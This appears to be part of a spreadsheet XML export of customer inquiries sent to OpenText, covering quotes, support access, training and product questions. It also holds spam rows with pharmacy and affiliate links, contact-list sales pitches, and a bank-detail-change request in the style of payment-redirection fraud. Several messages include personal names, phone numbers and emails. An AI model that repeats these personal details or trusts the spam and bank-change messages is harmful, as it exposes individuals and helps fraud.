Industries covered: E-commerce, Retail, Software, Information Technology, Marketing &amp; Advertising, Toys &amp; Games, Wine &amp; Spirits, Bicycle/Rickshaw, Sporting goods, Insurance, Medical, Banking, Nonprofits or fund accounting, Hospitality, Labeling, Electronics, Healthcare, Educational and Hi-tech Institutions, Mining, Oil and Gas, Waste Water management, Energy &amp; Utility, Textile and printing, Transportation, Manufacturing, Real estate investment trust, Surveying, Finance/legal services, Insurance, Food &amp; Beverage, HVAC, Construction, Automobiles, Agriculture, Personal Computers &amp; Peripherals, Computer Equipment &amp; Peripherals, Manufacturing, Media &amp; Internet, Software Development &amp; Design, Software, Custom Software &amp; Technical Consulting, Health and Nutrition Products, Consumer Goods, Medical Devices &amp; Equipment, Semiconductor &amp; Semiconductor Equipment's, Defense, Aviation  and many more across the globe._x000D_
_x000D_
Kindly let me know your target criteria or any specific audience you want to focus so that I can provide you few free samples and counts based on that:_x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Looking forward to continued success with you._x000D_
_x000D_
Regards,_x000D_
Alice Miller_x000D_
Marketing Manager_x000D_
_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out".</t>
  </si>
  <si>
    <t>Is the StreamServe product sold directly by OpenText or is it sold through a reseller?  What resellers are authorized to sell?</t>
  </si>
  <si>
    <t>Need access to support portal from OpenText</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I want to kindly request if I can contact the CEO of the OpenText Corporation or someone under him who works directly for him. </t>
  </si>
  <si>
    <t>Dear Open Text support,_x000D_
_x000D_
we / Matris Maintenance team at Scania IT are using following licenses for "Gupta Team Developer Support" with the key_x000D_
SWPTPDGUPT0000000009 / GUPTTDRNW12MESD and_x000D_
Gupta Hotline Support with the key _x000D_
SRSWCSGUPT0000000001 /GUPTHTLSUPP12MESD._x000D_
_x000D_
My questions is what is including above support when we are _x000D_
going to upgrade from current Gupta Team Developer v.6.1_x000D_
to version v.6.3._x000D_
Can we use the trial version of Gupta Team Developer v.6.3_x000D_
for testing purposes and how is the support for the same ?_x000D_
_x000D_
Much thanx in advance for your help_x000D_
_x000D_
Many Thanks &amp; Regards_x000D_
Jungkan Iljas_x000D_
_x000D_
Project / Maintenance Manager _x000D_
Scania IT_x000D_
Mobile: +46 70 78 89419</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext Editor,_x000D_
 _x000D_
Over 60% of companies have reported that they are looking to invest in artificial intelligence and bot enhances solutions for customer service. Given the huge interest in this topic, we’ve written a 37-page research report that details the history, frameworks, pricing, case studies, and top players in the space. _x000D_
 _x000D_
Would this be interesting to your Opentext readership? If so, I’m happy to share it with you when it’s published._x000D_
 _x000D_
Look forward to hearing from you._x000D_
 _x000D_
Best,_x000D_
Quinn_x000D_
 _x000D_
TOPBOTS is a media and education company focused on applied artificial intelligence and bots. </t>
  </si>
  <si>
    <t>Sinopec has acquired Chevron South Africa Company.   We need a solution for historical data repository.  Please contact us before June 30th to be included in the vendor list. Thanks.</t>
  </si>
  <si>
    <t>Is your Sentiment Analysis tool available via API and what is the pricing scheme?  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day_x000D_
_x000D_
Kindly find here my training plan request for your attention. Here below find the details about the course I need to attend:_x000D_
_x000D_
Course Code      : NE-20409_x000D_
Course Name    : Server Virtualization with Windows Server Hyper-V and System Center_x000D_
Exam Number   : 70-409_x000D_
Duration              : ???_x000D_
Price                      : ???_x000D_
Date                      : July 2017 Only_x000D_
_x000D_
The reason for this stipulated date is due to my commitment as a single parent. My kids will be on holidays during the Winter Holidays and will give me chance to attend without any hassle. May you please issue a quote on the above including the examination insurance if I had to re-write._x000D_
_x000D_
Furthermore, I want to request that you issue another quote including the following course but under one quote:_x000D_
_x000D_
Course Code      : NE-20412_x000D_
Course Name    : Configuring Advance Windows Server 2012 Services_x000D_
Exam Number   : 70-412_x000D_
Duration              : ???_x000D_
Price                      : ???_x000D_
Date                      : July or October 2017_x000D_
_x000D_
_x000D_
Please do not hesitate to call me for any further clarity. Your prompt response will be highly appreciated considering available time before training._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
I am Nuria Gimenez, I am looking for a Document Management System (or ECM). I would like to contact with some Spanish Manager to expose my necesities and get a budget. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm supporting a client in a software selection for EMC solutions. We would like to include your platform in the contest. We prepared an evaluation grid. Please, could you give me a commercial contact so I can better explain the selection process and share the evaluation grid?_x000D_
_x000D_
Thank you very much_x000D_
Best regards_x000D_
Paolo</t>
  </si>
  <si>
    <t>Request for my support access</t>
  </si>
  <si>
    <t>Liebes Team von OpenText,_x000D_
_x000D_
Auf der SuccessConnect 2017 hatten zwei Kolleginnen von mir, Frau Kunz und Frau Grabmann in Ihrem Stand Kontakt zu Frau Wanie. _x000D_
Da wir Interesse an der Nutzung der von Ihnen angebotenen Erweiterung zu SF haben, würde ich mich freuen, wenn Sie den Kontakt zu uns aufnehmen._x000D_
_x000D_
Herzlichen Dank und beste Grüße,_x000D_
_x000D_
Svenja Kleimann</t>
  </si>
  <si>
    <t>product checking</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I have heard from one of my colleague that you have a solution that may potentially be what we are looking for. _x000D_
_x000D_
Here is our requirement, we need something like a container similar to a file system that allows us to deposit files or folder inside. _x000D_
It should allow us to manage the version or keeping track of the access. _x000D_
The users are able to check in and check out the files. _x000D_
_x000D_
Do you have a system or tool that allowed us to do that? Hope to hear from you. We are interested to liaise with your Singapore partner to find out more. _x000D_
_x000D_
Thank you. </t>
  </si>
  <si>
    <t>I have HP ExStream installed in another server but I think it's configured to be used for a JAVA application. Now, I want to connect this HP ExStream with a .NET application and I don't know if it's possible because in the response I receive the next error:_x000D_
Engine Execution Error. Return Code: 12</t>
  </si>
  <si>
    <t>Hi we are Sugarmat, we are on the Nordstrom drop ship program and I want to know more about creating the UPC catalogue with you and testing EDI. Thanks!</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Hope you are well._x000D_
_x000D_
We have a customer tenders RFQ for the following renewal:_x000D_
Content Intelligence	_x000D_
SKU: S-LL-CONTINTELL-KIT	_x000D_
QTY: 50_x000D_
Blazon for content suite - with add on document filtering technology 	SKU: S-IGR-21-OT-BLE	_x000D_
QTY: 2_x000D_
Blazon for content suite - base module	_x000D_
SKU: S-IGR-CS-OT-DFTOPTION	_x000D_
QTY: 2_x000D_
_x000D_
Can you please provide us a quote with indicative pricing for this license renewal? _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Please subscribe to newsletter</t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for IT services on google.com._x000D_
_x000D_
And I was wondering if you would like to partner up? _x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your services online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second animated whiteboard video for your so product for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more and get started at www.30secondexplainervideos.com/whiteboard-promo_x000D_
_x000D_
Or can you shoot me a quick email for a brief discussion!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/whiteboard-promo_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
_x000D_
I'm looking for a quote to migrate &amp; setup 100 fax lines to efax service _x000D_
_x000D_
Sarath </t>
  </si>
  <si>
    <t>We would like to enquire regarding Opentext Documentum's Life-Sciences Suite for our company in Israel which provides Regulatory Affairs and Quality services to pharmaceutical and medical devices corporations._x000D_
_x000D_
Please be in contact with me via e-mail:_x000D_
alon@bioplan.co.il_x000D_
_x000D_
Thank You,_x000D_
Alon Wagner_x000D_
BioPlan Ltd._x000D_
Israel</t>
  </si>
  <si>
    <t xml:space="preserve">I used to have an Easylink TELEX/TWX account, and am curious if those are still available ...   _x000D_
_x000D_
Please advise ..._x000D_
_x000D_
_x000D_
-rich-_x000D_
Rich Allcorn_x000D_
eMail:  rich@allcorn.us _x000D_
_x000D_
_x000D_
ETX_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Demo for  Web Content Management System </t>
  </si>
  <si>
    <t>Need Windows 7 64-bit client now, but will need a 32-bit/64-bit client for Windows 10 that we testing.  I am out of the office on holiday, but checking email.</t>
  </si>
  <si>
    <t>Technical Question:  Can someone provide me with a diagram showing how the Documentum Records Manager communicates with the storage and archive to delete records that have exhausted their retention policy.  Also are there any interoperability specifications?  Which storage vendors/systems/operational software is the Documentum Records Manager compliant with?  I am creating a roadmap for IT.  Many thanks,  Jennifer</t>
  </si>
  <si>
    <t xml:space="preserve">Application for a three months internship in Rabat (Morocco):_x000D_
Rajemison Tahirintsoa_x000D_
Email: tahiry_raj@hotmail.fr_x000D_
Tel: 0022554327163 (Côte d'Ivoire); 00212699035470 (Morocco)_x000D_
Address: Aghien, 7th tranche, Abidjan, Côte d’Ivoire_x000D_
_x000D_
Subject: Application for a 3-month internship in Rabat (Morocco)_x000D_
_x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
I am currently looking for an internship, even though unpaid, in the field of IT development to close my 3rd year of studies (Bachelor in Computer Science) and also in order to present my dissertation. Indeed, I am a student in the 3rd year at the British Institute of Management and Technology (IBM-T) located in Abidjan (Côte d'Ivoire), where I just passed my exams._x000D_
With my background, I acquire essential knowledge in programming (HTML5, CSS3, PHP) as well as the development of software and mobile application and networks. I gain technical experience and I will bring all my contributions to fulfil all the tasks you are going to assign me. My research theme that I want to focus on windev development, needs to be defined with your company._x000D_
_x000D_
 I look forward to hearing from you soon._x000D_
_x000D_
Yours faithfully,_x000D_
_x000D_
RAJEMISON Tahirintsoa_x000D_
_x000D_
N.B: My family currently resides in Rabat-Agdal (Morocco) and my wish is to do my internship there. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I need to get a quote for RightFax.  I had previously inquired and was contacted by James Longley but never received any information.</t>
  </si>
  <si>
    <t>I am looking for a trial license to install and test Exceed On Demand software in our environment. Please help me get the trial license. For any more details, please call me on the given number.</t>
  </si>
  <si>
    <t xml:space="preserve">I got a new phone. I've downloaded the first class app but I can't sign in because I don't remember my password. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are a working on a proposal for a telco company that wants to replace FileNet ECM application._x000D_
We are searching market about solutions, one of them is yours ECM solution._x000D_
_x000D_
Items loaded into ECM solution:_x000D_
- Digitalized customer ID_x000D_
- Digitalized contract documentation _x000D_
- Invoice statements (PDFs)_x000D_
- Letters sent to customer (PDFs)_x000D_
_x000D_
Main concerns about future solution:_x000D_
- Currently solution handles 25 TBytes of data._x000D_
- After each bill cycle all invoices are loaded into system, high availability is required_x000D_
_x000D_
Migration, have you handled this volume of date in previous projects?_x000D_
_x000D_
Are you able to provide documentation or workshops to present in a deep way your solution and recommendations?_x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>New a solution for future content management and historical data storage.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am interested in your product EMC Captiva Recognition, for MICR CMC7 scan in checks, I want to understand how works and with which platforms does. _x000D_
Thanks very much!_x000D_
</t>
  </si>
  <si>
    <t>Request a demo and pricing on OpenText Cloud solution.</t>
  </si>
  <si>
    <t>Looking at acquiring Software and License to deploy single Documentum Server.  We are integrating application to support Documentum via REST interface.</t>
  </si>
  <si>
    <t>Exstream Empower training</t>
  </si>
  <si>
    <t>We would like to purchase five additional seats, added to our current 27 seats, of Brava! Desktop. Please send a quote to softwareadmin@burnsmcd.com.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am reaching out in regards to possibly opening up an account with GXS/OpenText as we work with a handful of retailers that require UPCs be entered in to a catalog prior to placing orders. Are you able to email me informaiton regarding the set up process &amp; fees? I look forward to hearing from you soon._x000D_
_x000D_
Thank you!_x000D_
Sia</t>
  </si>
  <si>
    <t>Customer Experience Management technical questions.</t>
  </si>
  <si>
    <t>We are receiving the error "failed due to invalid server licensing" on a Ricoh copier. Can you advise on how to resolve this issue?</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I want to do OpenText Streamserve Developer Certification Exam._x000D_
_x000D_
I did search for it and I see that some prerequisites are there to do Certification._x000D_
Prerequisites_x000D_
•	3-3710 OpenText StreamServe Fundamentals (5 days)_x000D_
•	3-3715 OpenText StreamServe OpenText StreamServe Document Automation and Post Processing (3 days)_x000D_
_x000D_
Is it possible to attend the exam online by preparing myself without attending the prerequisite trainings. _x000D_
Because I am already working on Streamserve Development and Manintenance projects from 3 years onwards. I am already aware of StreamServe fundamentals , Post processing and all…_x000D_
_x000D_
Could you please let me know more details about OpenText Streamserve Developer Certification Exam_x000D_
_x000D_
_x000D_
Thank You,_x000D_
_x000D_
Met vriendelijke groet / With Kind Regards,_x000D_
M. Kumuda_x000D_
+31652306465</t>
  </si>
  <si>
    <t>Product Evaluation</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir bitten um eine schriftliche Email-Bestätigung über die Änderung Ihrer Bankverbindung._x000D_
SWIFT: CITIGB2L_x000D_
IBAN: GB88CITI18500817495781_x000D_
_x000D_
Vielen Dank im Voraus._x000D_
Freundliche Grüße_x000D_
_x000D_
I.Kreibel_x000D_
Finance_x000D_
Comline AG</t>
  </si>
  <si>
    <t>Interested in OpenText Content Management</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
My name is Mark and I am the Marketing Manager here at Fullestop, a web design and development company. I actively research and write content around technology advancements and innovations._x000D_
 _x000D_
This time I have created an infographic - https://www.fullestop.com/blog/wp-content/uploads/2017/06/Happy-6th-birthday-googleplus-infographic.jpg  on topic “Infographic: Happy 6th Birthday Google+ “.  Do you know that Google+ has 440 million monthly active users? There are many more unrevealed facts that we do not know about Google+ and hence I have created this infographic to depict their timeline of these 6 years. _x000D_
 _x000D_
I was browsing your website and noticed that you work and publish similar content and hence thought to share this infographic with you that talks about Google+’s timeline and some important figures. I really think that your readers would find it very engaging._x000D_
 _x000D_
If you want to use this infographic, then please go ahead. All I would ask is to credit us as image source by giving us a link back to URL https://www.fullestop.com/ ._x000D_
 _x000D_
If you want, I can provide you a unique summary on the same._x000D_
 _x000D_
Looking forward for your feedback and thank you for your consideration!_x000D_
 _x000D_
Best Regards,_x000D_
Mark</t>
  </si>
  <si>
    <t>Hello,_x000D_
Greetings from TISH._x000D_
we are Pune, India based software reseller. One of our customer is having requirement for below software_x000D_
1. Brava Enterprise Viewer for IBM TRIRIGA 16.02 Enterprise floating developer license, distribution license - 4 Quantity_x000D_
2. Documentum floating developer license, distribution license - 1 Quantity_x000D_
please share the prices for the same.</t>
  </si>
  <si>
    <t>Enquiry about training and workshop on Open text VIM and ICC. Do you have any weekend sessions ?</t>
  </si>
  <si>
    <t>Technical evaluation for iOS mobile solution for mail and files with IRM protection</t>
  </si>
  <si>
    <t>We are in need to use IRM solution to protect company data. Please help to contact me asap to clarify tsmc scenario. Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Business Opurtunity </t>
  </si>
  <si>
    <t>How do I (register to) download the latest version of Team Developer software using Team Developer.NET GLS Licence No: 10907689</t>
  </si>
  <si>
    <t>[url=http://amzn.to/2nD6Xsh]Bio Baumwolle Neugeborene Handschuhe[/url] - Bio Baumwolle Neugeborene Handschuhe</t>
  </si>
  <si>
    <t>[url=http://levitrabis.com/levitra/q.php?q=levitra-cheap-online-buy-cheap-generic-for-sale]Levitra cheap online buy cheap generic for sale[/url] - Levitra cheap online buy cheap generic for sale</t>
  </si>
  <si>
    <t>Hi, Good day, I represent the Honduran financial group atlantida, could you please refer me a list of companies that provide Open Text implementation consultancies for the Central American region, or Latin America in general._x000D_
_x000D_
I only need the list of companies, because I prefer to contact them personally._x000D_
_x000D_
thank you very much.</t>
  </si>
  <si>
    <t>OpenText Partner Program specifically looking forward to partner in OpenText Exstream area.</t>
  </si>
  <si>
    <t>Fax2Email- we would like to learn more about this service.</t>
  </si>
  <si>
    <t>Necesito información de Documentum, favor de ponerse en contacto algún representante en México</t>
  </si>
  <si>
    <t>We are currently looking for a solution to help streamline our print mail process.  We are looking for a solution that will hopefully hit all of the following points:_x000D_
•	Handle communication of data (mailing lists) through XML_x000D_
•	Clean up mailing lists with CASS, PAVE (presorting), and NCOA_x000D_
•	Have an user friendly Document Composition tool that doesn’t require very technical users_x000D_
•	Have Layers in the Document Composition solution to allow for both Variable Data and pre-printed forms_x000D_
•	Print Intelligent Mail barcodes_x000D_
•	Create eCertify mail barcodes and track them through USPS_x000D_
•	Print Inserter Instruction barcodes_x000D_
•	Print Tray Tags_x000D_
•	Have the ability to print samples (typically 10-20) and approve them before the whole mailing is printed_x000D_
•	Handle Reprints kicked back from the Inserter_x000D_
•	Have a Workflow Designer to automate repetitive tasks_x000D_
_x000D_
Based on your available information, it looks like the Exstream product may be able to help us greatly.  If you could, please have a member of your team contact me so I may gather some additional information to discover if this is the right solution for us.</t>
  </si>
  <si>
    <t xml:space="preserve">Have a sales rep please call me! </t>
  </si>
  <si>
    <t>We are interested in getting information on potential training classes for the Captiva Capture product.  Could someone please contact me with possible options?</t>
  </si>
  <si>
    <t>I would like to get access to your customer forums so I can look for some answers about problems we have run into using what had ben HP ExStream._x000D_
_x000D_
Thanks_x000D_
_x000D_
Randy</t>
  </si>
  <si>
    <t>Flagstar is going to be starting a search for a DM solution and we want to learn more about Opentext. Can you please get me in touch with the right account rep and we can get the NDA process started. Thanks!</t>
  </si>
  <si>
    <t>Looking for Faxing and Document Management Solutions for a medium sized Home Health Care organization with six locations in four states and about one hundred employees. Approx 20,000 sheets faxed per month.</t>
  </si>
  <si>
    <t>Faxing solution to ingrate with our EMR for healthcare. We are a vendor in need of a product for our customers.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring the contact list to reach your target folks ?_x000D_
_x000D_
We have complete contacts details of : Buyers, Purchasing, CEO / CFO, President, VP, Technology Director, Electronics &amp; Peripheral Equipment Manufacture / Supplier / Assemblers, Design &amp; Development, Network Engineer, Test and Measurement, Engineering Technology, Sales, marketing and administration, Government Sector, Distribution Agent, Financial Investment, CRM user, IT resellers and various key decision makers from the concerned industry._x000D_
_x000D_
These job titles are from various sectors e.g Information Technology, OEMs, Software Developers, BPO's, Medical Institutes, Educational Institutes, Government Offices and many more._x000D_
_x000D_
If this is not your target industry, Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title : _x000D_
Target Geography :_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Best Regards,_x000D_
Kiyara James_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring the contact list to reach your target folks ?_x000D_
_x000D_
We have complete contacts details of : Buyers, Purchasing, CEO / CFO, President, VP, Technology Director, Electronics &amp; Peripheral Equipment Manufacture / Supplier / Assemblers, Design &amp; Development, Network Engineer, Test and Measurement, Engineering Technology, Sales, marketing and administration, Government Sector, Distribution Agent, Financial Investment, CRM user, IT resellers and various key decision makers from the concerned industry._x000D_
_x000D_
These job titles are from various sectors e.g Information Technology, OEMs, Software Developers, BPO's, Medical Institutes, Educational Institutes, Government Offices and many more._x000D_
_x000D_
If this is not your target industry, Kindly let me know your target criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job Title : _x000D_
Target Geography :_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Best Regards,_x000D_
Kiyara James_x000D_
Marketing Manager_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have a contract with the vendor Seward Consulting. Is it possible to have a direct contract with OpenText. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I just came across your site and found it very interesting!_x000D_
I wonder if it is possible to publish permanent good quality post on your site with dofollow backlink to my site?_x000D_
Could you let me know if there is such opportunity and what are the terms._x000D_
_x000D_
Thank you very much and I am looking forward to hear from you!</t>
  </si>
  <si>
    <t>Access to database to complete important program work</t>
  </si>
  <si>
    <t>Need to acquire demo version of RightFax 10.6 asap for upcoming server upgrade (7/9/17).  Old server has version 10.0.0.349</t>
  </si>
  <si>
    <t>What is the best training program for Exstream Design &amp; Production, Design Manager Ver. 9.0.104?_x000D_
Thank You.</t>
  </si>
  <si>
    <t>RFQ for customer - Please contact ASAP.</t>
  </si>
  <si>
    <t>We are looking for a company who offers health information management by way of indexing our patient's clinical and registration documents into our EMR.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently a customer of the EasyLink Fax service utilizing the email to fax functionality and that is working great for us.  I’m just now starting to look for a service that goes from fax to email.  What are the options for that?  Is there anything available that allows us to port our current fax numbers so those would now start going to an email?_x000D_
_x000D_
Thanks for your assistance,_x000D_
Doug_x000D_
_x000D_
EasyLink Acct #: 071868-001</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My company is currently working on the AI World Congress 2018 within the Tech@02 Event (January 30th &amp; 31st - The O2 Arena, London)  - _x000D_
_x000D_
We have the likes of Google, Barclays, Microsoft, IBM Watson, Starship, Erle Robotics , Deep Mind and many more, who will be discussing Artificial Intelligence implementation within business markets such as; Retail, manufacturing, banking, law, accountancy, healthcare, energy and more._x000D_
_x000D_
I was hoping to see whether you would look at attending, exhibiting or sponsoring the event?_x000D_
_x000D_
If you were able to let me know your feedback I would be very grateful_x000D_
_x000D_
Thanks in advance,</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the Database of Human Resource Software Users from all the industries. _x000D_
_x000D_
We have the complete contact details and verified email addresses of:- CEOs, CFOs, COOs, CIOs, CTOs, Chief Talent Officers and all manners of key decision makers from various departments such as HR, Talent Management, Recruitment, Compensation, Training &amp; Learning, Employee Relations/Communications, Human Capital Management, IT &amp; Technology, Development, Payroll who might be interested in your product/services like:-_x000D_
_x000D_
TRIS Requirement Software, Cascade HR Software, Applicant Tracking Software, Employ Recruitment Software, WEB Based Recruitment Software, REXX Recruitment Software, Black Dog Recruitment Software, Candidate Management, e-Recruitment, Dynamic Communication, Integration, Agency Management and many more related software across the globe._x000D_
_x000D_
Kindly let me know your target criteria so that I can understand your needs better:_x000D_
_x000D_
Target Industry _________x000D_
Target Job Title __________x000D_
Target Geography  ____________x000D_
_x000D_
Looking forward to continued success with you._x000D_
_x000D_
Regards,_x000D_
Alice Miller_x000D_
Marketing Manager_x000D_
_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out".</t>
  </si>
  <si>
    <t xml:space="preserve">Want information on rightfax.  Pricing, process, etc. </t>
  </si>
  <si>
    <t>Inquiry on EMC D2 configuration course</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I would like to know course details of OpenText Exstream training (ID: 1-7600- OpenText Exstream Introduction to Design and Production). I have sent couple of follow up emails to the training department but I didn't received any response._x000D_
_x000D_
Please let me know the details at the earliest so that I can plan accordingly for 10-12th July session._x000D_
_x000D_
Thank you_x000D_
Ayan_x000D_
ayyan.mitra@gmail.com_x000D_
</t>
  </si>
  <si>
    <t>We purchased the program Teleform back before you obtained the rights to it.  I have recently upgraded the computer it was installed on and need to reinstall the software.  I can not find any links to download it though.  Please provide a link or location where I can download version 10.8 of the Teleform software.  I can provide a serial number if needed._x000D_
Thank you</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
zwischen 20.06.2017 und 22.06 2017 hat Ihr Mitarbeiter Thomas Stock bei uns übernachtet. Wir haben eine wichtige Information für Herrn Stock. Könnten Sie Herrn Stock bitten, mit uns telefonisch oder per E-mail Kontakt aufzunehmen? _x000D_
_x000D_
Vielen Dank im Voraus_x000D_
_x000D_
und herzliche Grüße nach Baden_x000D_
_x000D_
Julia Hierl</t>
  </si>
  <si>
    <t>i have documentum 6.7 server in that Dctm-rest service is not installed on application server _x000D_
i have to add dctm-rest service in that server_x000D_
how i can install service and from where i can download_x000D_
Thank You,</t>
  </si>
  <si>
    <t>I would like to know what version of Open text Archiving solution is compatible with S/4 HANA? Does 10.5 version compatible with S/4 Hana? or it needs to be upgrade to V16.</t>
  </si>
  <si>
    <t>I got the email about my access to my Support. I activated and verified my account as well.  But I am unable to access my Support area after I login to opentext.com to download the software</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
 _x000D_
We are working on an opportunity in India where we will be positioning entire Cisco Collaboration solution and we need Opentext to provide FAX solution by interoperating with Cisco Unity Connection._x000D_
Can anyone from opentext reach out to us in regards to pricing/ordering and solution design?_x000D_
_x000D_
Please drop mail to me as well as to Pranav who is working with me. prandesa@cisco.com_x000D_
 _x000D_
Thanks &amp; Regards,_x000D_
 _x000D_
Manoj Chandrasekar_x000D_
Systems Engineer_x000D_
Collaboration | CISCO_x000D_
Email: machand2@cisco.com_x000D_
Work:   +91 80 4426 0411_x000D_
Mobile: +91 990 004 1350_x000D_
Internal: 8 653 1066_x000D_
CMR: http://cs.co/manoj/</t>
  </si>
  <si>
    <t>At present using Myriad 6.2 version would like to upgrade for the Brava floating license.</t>
  </si>
  <si>
    <t>It seems I can't access to mySupport, can you tell me how my account can be activated?</t>
  </si>
  <si>
    <t>Access to support / user manual area</t>
  </si>
  <si>
    <t>I would like to know more about OpenText, what it does in Organisations, how can employees get access to them and I would also like to know about the training offerings( Web based) and how can I get upcoming schedule training.</t>
  </si>
  <si>
    <t>Why I'm not allowed to visit this community.</t>
  </si>
  <si>
    <t>Access to My Support, Davy acquired PFC in Belfast, I believe our renewal number is 0018018197, the email renewal notice referenced RC125947-320191</t>
  </si>
  <si>
    <t>Hallo,_x000D_
in unserem Unternehmen wird momentan Open Text als Dokumentenarchiv verwendet, allerdings bin ich daran interessiert, Open Text Lösungen bezüglich der EU Datenschutzverordnung und BPM kennenzulernen._x000D_
_x000D_
Mit freundlichen Grüssen_x000D_
_x000D_
Martin Spiegler</t>
  </si>
  <si>
    <t>Evaluating a solution for content management. Please get in touch with me and Mr.Tham  email id waikoktham@cimb.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm a Documentum specialist and I have seen this post about OT Elite : https://community.emc.com/community/connect/documentum/blog/2017/03/21/new-opentext-elite-and-a-team-customer-communities-come-on-in?et=blogs.comment.created#comment-46965_x000D_
_x000D_
How can I get access to the Elite Hub ?_x000D_
Does our profile from EMC Community are transfered to this new forum ?_x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>To the attention of Ruth TOGNIA NANA, OpenText UK:_x000D_
Hi Ruth,_x000D_
I noticed you had a look at my linkdn profile._x000D_
I´d be glad if we could share some minutes talking along next week._x000D_
Best Regards_x000D_
Carlos</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind SAP-Dienstleister und zwei unserer Kunden wären möglicherweise an Ihren Lösungen "OpenText Business Center for SAP Solutions" und "OpenText Vendor Invoice Management" for SAP Solutions interessiert. _x000D_
_x000D_
Was ich in den Unterlagen allerdings nicht finden konnte ist, wie die technische Integration ins SAP verläuft. So stehen z.B. für mich folgende Fragen im Raum:_x000D_
- Wir werden die Scan-Metadaten und die Dokumente selbst ans SAP und das dahinterhängende Archiv weitergereicht?_x000D_
- Sind die Lösungen mit den gängigen Archivlösungen (z.B. SAP Content Server) kompatibel oder ist dafür z.B. Documentum notwendig?_x000D_
- Können z.B. für Eingangsrechnungen bereits bestehende Workflows behalten werden bzw. wie stark müssten diese adaptiert werden?_x000D_
_x000D_
Vielen Dank und freundliche Grüße,_x000D_
Wolfgang Wiesmayr</t>
  </si>
  <si>
    <t>We need an EDI Mailbox for exchanging documents with 2 trading partners; Secure FTP requested (no VPN) please call asap</t>
  </si>
  <si>
    <t>To explore business opportunity with the OpenText scanning solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Penn United contact, Donald Olean – IS Manager, requires assistance with product installation for Gupta Team Developer 6.2._x000D_
_x000D_
Please contact:_x000D_
don_olean@pennunited.com_x000D_
_x000D_
Inquiry:_x000D_
Penn United owns 3 licenses. At this point only two are used and I need to install the third license for a new programmer. How do I get the Product Media Code for the new installation?_x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Need some technical help in upgrading FCS/FCIS from v.7.1 to v.16._x000D_
Have questions more directly as to whether FCS/FCIS v.7.1 will run on WindowsServer 2012 (currently running on WinSer2003)</t>
  </si>
  <si>
    <t>The company I work for is migrating to Win 10, and I am looking for information regarding the compatibility of RightFax and Windows 10_x000D_
Can you please tell me if RightFax Print Processor x64 v 10.5.0.895 and RightFax Product Suite- Client v 10.5.0.895 are compatible with Windows 10?_x000D_
Thank you,_x000D_
Jeffrey</t>
  </si>
  <si>
    <t>We want to convert our documents to digital data.</t>
  </si>
  <si>
    <t>Aloha! _x000D_
_x000D_
I'm contacting you in hopes you will be able to assist me with pulling all of the information I have on GXS into a spreadsheet? I have tried to download it and nothing is happening. Account # R4820A _x000D_
_x000D_
Mahalo! _x000D_
_x000D_
Kara Pallai</t>
  </si>
  <si>
    <t>Employment Verification for Steven Edward Greenberg; please contact me and let me know the best way to go about obtaining an employment verification from your company. Thank you</t>
  </si>
  <si>
    <t>Would like to purchase the online version of the class_x000D_
2250 RightFax Fundamentals - Course</t>
  </si>
  <si>
    <t>Estamos iniciando um levantamento para a aquisição de uma solução de GED/ECM. Gostaríamos de saber saber se estariam interessados em participar e, em caso positivo, se poderíamos agendar uma reunião para que nos fosse apresentadas as soluções da OpenText._x000D_
